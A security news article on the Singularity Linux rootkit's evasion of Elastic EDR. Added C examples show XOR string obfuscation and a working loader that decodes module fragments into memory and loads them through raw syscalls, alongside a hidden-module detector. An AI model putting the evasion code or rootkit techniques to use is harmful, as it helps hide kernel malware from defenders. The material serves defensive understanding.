Researchers unveil Linux rootkit evading Elastic Security EDR

A security researcher publishing as 0xMatheuZ has released Singularity, a Linux kernel rootkit that bypasses Elastic Security's endpoint detection and response (EDR) product. The tool exposes weaknesses in both signature-based and behavioral detection of kernel-level threats by obfuscating the module's strings, its symbol names and its on-disk form. Published on GitHub, it highlights the continuing difficulty of identifying threats that run in the kernel.

The researcher, known by the pseudonym 0xMatheuZ, released Singularity on GitHub as a Linux kernel rootkit designed to evade Elastic Security's EDR agent, Elastic Defend. An unmodified rootkit of this kind typically triggers more than 26 Elastic Security alerts, including file quarantines and process terminations; Singularity avoids them through four evasion strategies.

The first technique is compile-time string obfuscation: strings that signature rules key on, such as "GPL" and "kallsyms_lookup_name", are split into adjacent literals, for example MODULE_LICENSE("G" "P" "L"), which the C compiler joins back together. This defeats YARA rules and grep-style scanners that match the contiguous string in the module source while preserving functionality. Because the compiler concatenates adjacent literals during translation, however, the joined string is still present in the compiled object; keeping it out of the artifact on disk depends on the module encoding described under the third technique below.
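The following added example (not code from the Singularity repository) makes that distinction concrete. It compares the adjacent-literal form from the article against a byte-wise XOR-encoded form, which is an alternative written for this illustration and not something the page attributes to the project. The symbol name kallsyms_lookup_name is the one named above; the key value 0x5A, the SIG macro and the function names are this example's own choices. Both arrays are scanned the way a signature engine scans a file, and only the XOR form keeps the string out of the data at rest:

```c
/* string_obf_demo.c: added example, not code from the Singularity repository.
 * Build: cc -O2 -o string_obf_demo string_obf_demo.c && ./string_obf_demo */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define SIG "kallsyms_lookup_name"   /* the signature a YARA rule would match */

/* 1. The article's technique: adjacent literals.  The C compiler joins
 *    "kallsyms_" "lookup_name" during translation, so the object file still
 *    holds the contiguous string; only tools that scan the source text are
 *    fooled. */
static const char concat_literal[] = "kallsyms_" "lookup_name";

/* 2. A form that really keeps the signature out of the binary: each byte is
 *    stored XORed with a constant key.  'k' ^ K is a constant expression, so
 *    the compiler emits the XORed byte, and the plaintext only exists in a
 *    stack buffer after decode_xor() runs.  K = 0x5A is arbitrary. */
#define K 0x5A
static const unsigned char xor_blob[] = {
    'k' ^ K, 'a' ^ K, 'l' ^ K, 'l' ^ K, 's' ^ K, 'y' ^ K, 'm' ^ K, 's' ^ K,
    '_' ^ K, 'l' ^ K, 'o' ^ K, 'o' ^ K, 'k' ^ K, 'u' ^ K, 'p' ^ K, '_' ^ K,
    'n' ^ K, 'a' ^ K, 'm' ^ K, 'e' ^ K,
};

/* Decode `n` XORed bytes into `out` as a NUL-terminated string. */
static void decode_xor(const unsigned char *in, size_t n, unsigned char key,
                       char *out, size_t outsz)
{
    size_t i;
    for (i = 0; i < n && i + 1 < outsz; i++)
        out[i] = (char)(in[i] ^ key);
    out[i] = '\0';
}

/* Byte-level substring search, the way a signature scanner sees a file. */
static int bytes_contain(const unsigned char *hay, size_t n, const char *needle)
{
    size_t m = strlen(needle);
    for (size_t i = 0; i + m <= n; i++)
        if (memcmp(hay + i, needle, m) == 0)
            return 1;
    return 0;
}

/* 1: the concatenated literal still contains the full signature. */
int concat_literal_leaks_signature(void)
{
    return bytes_contain((const unsigned char *)concat_literal,
                         sizeof concat_literal, SIG);
}

/* 0: the XORed bytes never contain the signature. */
int xor_blob_leaks_signature(void)
{
    return bytes_contain(xor_blob, sizeof xor_blob, SIG);
}

/* 1: decoding at run time reproduces the string the rootkit needs. */
int xor_blob_decodes_to_signature(void)
{
    char plain[64];
    decode_xor(xor_blob, sizeof xor_blob, K, plain, sizeof plain);
    return strcmp(plain, SIG) == 0;
}

int main(void)
{
    printf("adjacent literals leak \"%s\": %d\n", SIG, concat_literal_leaks_signature());
    printf("xor blob leaks \"%s\": %d\n", SIG, xor_blob_leaks_signature());
    printf("xor blob decodes correctly: %d\n", xor_blob_decodes_to_signature());
    return 0;
}
```

The demo program necessarily contains the plaintext for its own comparison; a real module would carry only the encoded bytes and decode them on the stack immediately before use. In Singularity's case the protection of the file on disk comes from the XOR-encoded fragments of the third technique rather than from the literal splitting alone.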

Second, symbol name randomization replaces predictable function names such as "hook_getdents", "fake_tcp4_seq_show" and "hide_module" with generic, kernel-looking names prefixed with "sys", "kern" or "dev". An allowlist keeps the names of the kernel APIs the module imports unchanged, and regular-expression rewriting applies each rename consistently across the source so the build does not break.

Third, module fragmentation splits the compiled .ko into 64 KB segments, each XOR-encoded with a randomly generated 16-byte key. A custom loader decodes and reassembles them in memory through memfd_create, so the complete module never exists on disk for static analysis to find. The loader issues its system calls directly with inline assembly rather than through the libc wrappers that EDR hooks monitor, supporting 64-bit systems as well as 32-bit ones via int $0x80.
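An added example of the fragment-and-reassemble flow, written for this article rather than taken from Singularity's loader. It implements the pieces the paragraph describes: 64 KB segments XOR-encoded with a 16-byte key, reassembly into an anonymous memfd, and finit_module issued through a raw system call. The raw path is implemented for x86-64 only (the syscall instruction); other targets fall back to libc's generic syscall(2), and the 32-bit int $0x80 path is not shown. The key derivation, struct and function names are this example's choices. The self-check uses a constructed 70,000-byte pseudo-image, not a real module, so it runs unprivileged; load_module_from_fd() needs CAP_SYS_MODULE and a real .ko for the running kernel and is never called by the check:

```c
/* frag_loader.c: added example of fragment -> memfd -> finit_module, not the
 * Singularity loader.  Linux only.  Build: cc -O2 -o frag_loader frag_loader.c */
#define _GNU_SOURCE
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/syscall.h>

#define SEG_SIZE (64 * 1024)
#define KEY_LEN  16
#define MFD_CLOEXEC_FLAG 1UL   /* MFD_CLOEXEC without pulling in sys/mman.h */

/* Enter the kernel without the libc wrappers that user-space hooks watch: the
 * `syscall` instruction on x86-64, libc's generic syscall(2) elsewhere.
 * Returns -errno on failure, as the kernel ABI does. */
static long raw_syscall(long nr, long a1, long a2, long a3)
{
#if defined(__x86_64__)
    long ret;
    __asm__ volatile ("syscall" : "=a"(ret)
                      : "a"(nr), "D"(a1), "S"(a2), "d"(a3) : "rcx", "r11", "memory");
    return ret;
#else
    long ret = syscall(nr, a1, a2, a3);
    return ret < 0 ? -errno : ret;
#endif
}

struct segment { uint8_t *data; size_t len; };

/* XOR with a repeating 16-byte key; XOR is its own inverse. */
static void xor_key(uint8_t *buf, size_t len, const uint8_t key[KEY_LEN])
{
    for (size_t i = 0; i < len; i++) buf[i] ^= key[i % KEY_LEN];
}

size_t segment_count(size_t image_len) { return (image_len + SEG_SIZE - 1) / SEG_SIZE; }

/* Build step: cut the module image into encoded segments (NULL on OOM). */
struct segment *fragment_image(const uint8_t *image, size_t len, const uint8_t key[KEY_LEN])
{
    size_t n = segment_count(len);
    struct segment *segs = calloc(n, sizeof *segs);
    if (!segs) return NULL;
    for (size_t i = 0; i < n; i++) {
        size_t off = i * SEG_SIZE;
        segs[i].len  = (len - off < SEG_SIZE) ? len - off : SEG_SIZE;
        segs[i].data = malloc(segs[i].len);
        memcpy(segs[i].data, image + off, segs[i].len);
        xor_key(segs[i].data, segs[i].len, key);
    }
    return segs;
}

/* Load step: decode each segment and append it to an anonymous memfd, so the
 * complete module only ever exists in RAM.  Returns the fd, or -errno. */
int reassemble_to_memfd(const struct segment *segs, size_t n, const uint8_t key[KEY_LEN])
{
    long fd = raw_syscall(SYS_memfd_create, (long)"", MFD_CLOEXEC_FLAG, 0);
    if (fd < 0) return (int)fd;
    for (size_t i = 0; i < n; i++) {
        uint8_t *plain = malloc(segs[i].len);
        memcpy(plain, segs[i].data, segs[i].len);
        xor_key(plain, segs[i].len, key);              /* decode in memory only */
        for (size_t done = 0; done < segs[i].len; ) {
            long w = raw_syscall(SYS_write, fd, (long)(plain + done), (long)(segs[i].len - done));
            if (w < 0) { free(plain); return (int)w; }
            done += (size_t)w;
        }
        free(plain);
    }
    return (int)fd;
}

/* finit_module(2) through the raw path.  Needs CAP_SYS_MODULE and a real .ko
 * built for the running kernel; the self-check below never calls it. */
long load_module_from_fd(int fd) { return raw_syscall(SYS_finit_module, fd, (long)"", 0); }

/* Self-check on a constructed 70,000-byte pseudo-image (not a real module):
 * two segments, encoded bytes differ from the input, memfd matches the input. */
int roundtrip_ok(void)
{
    enum { LEN = 70000 };
    uint8_t key[KEY_LEN], *image = malloc(LEN), *back = malloc(LEN);
    for (int i = 0; i < KEY_LEN; i++) key[i] = (uint8_t)(0x11 * i + 7);
    for (size_t i = 0; i < LEN; i++)  image[i] = (uint8_t)(i * 31 + 5);
    size_t n = segment_count(LEN);                      /* 65536 + 4464 bytes */
    struct segment *segs = fragment_image(image, LEN, key);
    int ok = segs && n == 2 && memcmp(segs[0].data, image, SEG_SIZE) != 0;
    int fd = ok ? reassemble_to_memfd(segs, n, key) : -1;
    ok = fd >= 0 && lseek(fd, 0, SEEK_SET) == 0 && read(fd, back, LEN) == LEN
         && memcmp(back, image, LEN) == 0;
    if (fd >= 0) close(fd);
    for (size_t i = 0; segs && i < n; i++) free(segs[i].data);
    free(segs); free(image); free(back);
    return ok;
}

int main(void)
{
    printf("fragment -> memfd roundtrip: %s\n", roundtrip_ok() ? "ok" : "FAILED");
    return 0;
}
```

Two caveats a defender should keep in mind: the memfd still appears under /proc/<pid>/fd as a /memfd: entry carrying whatever name was passed to memfd_create, and finit_module still goes through the kernel's module loader, so the load remains visible to an auditd rule on that syscall and to kernel module-load tracing even when the libc wrapper is bypassed. The evasion here is against user-space hooks and on-disk scanning, not against the kernel itself.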

Fourth, the ftrace hooking helpers, fh_install_hook and fh_remove_hook, are renamed to randomized identifiers, defeating rules that flag a module containing several of these well-known helper names.

Beyond evasion, Singularity hides processes from the /proc filesystem, hides files and directories whose names match "singularity" or "matheuz", masks TCP connections on port 8081, and grants root when triggered through a custom signal or an environment variable. It also carries an ICMP-based backdoor that spawns a reverse shell on a specific packet sequence, plus anti-analysis measures that obstruct tracing and sanitize logs.

For behavioral evasion, the kit stages a bash script at /singularity and runs it with an innocuous command line so that reverse-shell rules are not triggered. The script uses kill -59 to hide its PID and escalate privileges (59 lies in Linux's real-time signal range and is simply the number the rootkit treats as its trigger), and it compiles the loaders in /tmp rather than in the directories Elastic monitors. In the author's tests, Singularity loaded without an alert, hid its processes, and established root shells.

The work shows how brittle signature-based and behavioral detection remain against kernel-level threats, and argues for continuous rule updates, kernel integrity monitoring, memory forensics, and defense in depth that combines several of these approaches rather than relying on any one of them.
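One of the kernel-integrity checks the conclusion calls for, as an added example that is not part of the article or of Singularity's code. A loaded module that unlinks itself from the kernel's module list disappears from lsmod and /proc/modules, but its /sys/module/<name> directory, which carries an initstate file only for loaded (not built-in) modules, remains unless the rootkit removes that as well. The program below reports modules present in the second view but absent from the first. Whether Singularity's hide_module also removes the sysfs entry is not stated on the page, so treat this as one cross-view check among several rather than a complete detector. The fixture it builds under /tmp is constructed for the self-check, and its directory and file names are this example's own:

```c
/* hidden_module_check.c: added defensive example, not part of the article or of
 * Singularity.  Cross-checks /sys/module against /proc/modules.  Linux only.
 * Build: cc -O2 -o hidden_module_check hidden_module_check.c */
#define _GNU_SOURCE
#include <dirent.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* 1 if `name` is the first field of a line in a /proc/modules-style file,
 * 0 if not, -1 if the file cannot be read. */
static int listed_in_proc_modules(const char *proc_modules, const char *name)
{
    FILE *f = fopen(proc_modules, "r");
    if (!f) return -1;
    char line[512];
    int found = 0;
    while (!found && fgets(line, sizeof line, f)) {
        size_t n = strcspn(line, " \n");
        found = (n == strlen(name) && memcmp(line, name, n) == 0);
    }
    fclose(f);
    return found;
}

/* Every <sysfs_module>/<name> directory with an `initstate` file is a loaded
 * module (built-in modules have no initstate), so the kernel's module list must
 * also report it.  A module that unlinked itself from that list to hide from
 * lsmod still has its sysfs directory unless it removed that as well.  Returns
 * the number of such modules (names copied to `out`), or -1 on error. */
int find_hidden_modules(const char *sysfs_module, const char *proc_modules,
                        char out[][64], int max_out)
{
    DIR *d = opendir(sysfs_module);
    if (!d) return -1;
    struct dirent *e;
    int hidden = 0;
    while ((e = readdir(d)) != NULL) {
        char path[PATH_MAX];
        struct stat st;
        if (e->d_name[0] == '.') continue;
        snprintf(path, sizeof path, "%s/%s/initstate", sysfs_module, e->d_name);
        if (stat(path, &st) != 0) continue;                /* built-in: skip */
        int listed = listed_in_proc_modules(proc_modules, e->d_name);
        if (listed < 0) { closedir(d); return -1; }
        if (listed == 0) {
            if (hidden < max_out) snprintf(out[hidden], 64, "%s", e->d_name);
            hidden++;
        }
    }
    closedir(d);
    return hidden;
}

/* Constructed fixture (not a real system) under /tmp: a fake sysfs tree with a
 * visible module "good", a hidden module "evil" and a built-in "btin", plus a
 * fake modules file that lists only "good".  Returns 1 if exactly "evil" is
 * flagged, 0 otherwise, -1 if the fixture could not be created. */
int fixture_check(void)
{
    char root[] = "/tmp/modchk-XXXXXX", p[PATH_MAX], sysfs[PATH_MAX], procm[PATH_MAX];
    char names[4][64];
    const char *dirs[]  = { "module", "module/good", "module/evil", "module/btin" };
    const char *files[] = { "module/good/initstate", "module/evil/initstate", "modules" };
    if (!mkdtemp(root)) return -1;
    for (int i = 0; i < 4; i++) { snprintf(p, sizeof p, "%s/%s", root, dirs[i]); mkdir(p, 0700); }
    for (int i = 0; i < 3; i++) {
        snprintf(p, sizeof p, "%s/%s", root, files[i]);
        FILE *f = fopen(p, "w");
        if (!f) return -1;
        fputs(i < 2 ? "live\n" : "good 16384 0 - Live 0xffffffffc0000000\n", f);
        fclose(f);
    }
    snprintf(sysfs, sizeof sysfs, "%s/module", root);
    snprintf(procm, sizeof procm, "%s/modules", root);
    int n = find_hidden_modules(sysfs, procm, names, 4);
    for (int i = 2; i >= 0; i--) { snprintf(p, sizeof p, "%s/%s", root, files[i]); unlink(p); }
    for (int i = 3; i >= 0; i--) { snprintf(p, sizeof p, "%s/%s", root, dirs[i]); rmdir(p); }
    rmdir(root);
    return n == 1 && strcmp(names[0], "evil") == 0;
}

int main(void)
{
    char names[32][64];
    printf("fixture self-check: %s\n", fixture_check() == 1 ? "ok" : "FAILED");
    int n = find_hidden_modules("/sys/module", "/proc/modules", names, 32);
    if (n < 0) { perror("/sys/module or /proc/modules"); return 1; }
    printf("loaded modules in /sys/module but not in /proc/modules: %d\n", n);
    for (int i = 0; i < n && i < 32; i++) printf("  %s\n", names[i]);
    return 0;
}
```

Run it as any user on a live host to compare the real /sys/module and /proc/modules; a non-empty list warrants memory forensics of the kernel's module list rather than trust in either view.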
